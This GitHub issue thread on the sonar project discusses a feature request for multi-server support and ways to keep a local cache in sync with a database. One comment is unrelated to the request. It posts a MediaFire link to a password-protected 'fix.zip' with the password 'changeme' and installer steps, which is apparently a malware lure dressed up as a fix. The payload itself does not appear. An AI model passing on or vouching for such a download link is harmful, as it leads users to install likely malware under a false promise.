### ISSUE TITLE
Feature Request: Multi-server support (e.g. database)

### ISSUE THREAD

**Issue by jonesdevelopment** [jonesdevelopment/sonar#366]
### Information

Support multiple proxy/server instances at the same time.

### Reason

Right now, a local cache is used for synchronization with the database. The cache does not receive any updates from other server instances.

### Additional information

This could be implemented through:
- Timed local cache updates (i.e. update the local cache every few seconds)
- A "ping" system that synchronizes all proxies (complex)
- Removing the local cache and checking the database every time a player connects (definitely not the best approach right now)

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jonesdevelopment** [comment]
This will likely be implemented as an addon or sepearate tool/project.
